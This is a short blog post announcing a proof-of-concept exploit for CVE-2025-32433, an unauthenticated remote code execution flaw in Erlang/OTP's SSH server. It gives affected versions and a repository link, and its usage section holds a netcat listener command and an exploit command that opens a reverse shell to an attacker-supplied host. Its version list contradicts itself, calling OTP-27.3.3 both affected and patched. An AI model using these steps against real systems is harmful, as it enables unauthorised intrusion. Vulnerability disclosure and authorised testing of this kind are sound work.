Connect

What are You Looking For?

dollarboysushil
onSeptember 1, 2025

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
1 min read

CVE-2025-32433 – Erlang/OTP SSH RCE PoC

CVE-2025-32433

Overview

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server.
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

  • CVE: CVE-2025-32433
  • CVSS Score: 10.0 (Critical)
  • Affected Versions:
    • OTP-27.3.3 and earlier
    • OTP-26.2.5.11 and earlier
    • OTP-25.3.2.20 and earlier

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

References

Usage

Github Repo link

https://github.com/dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

Listener Setup:

nc -lvnp 1234

 Run Exploit:

python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : Target IP
  • --rport : Target SSH port
  • --lhost : Your IP for reverse shell
  • --lport : Your listener port

Disclaimer

This repository is for educational purposes only. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.

dollarboysushil
onSeptember 1, 2025
15 views
Share
Previous Article

Privilege Escalation PoC: Terraform sudo Exploit

Next Article

Web Application Authentication Vulnerabilites

Write a Comment

Leave a Comment

Your email address will not be published. Required fields are marked *

Read Next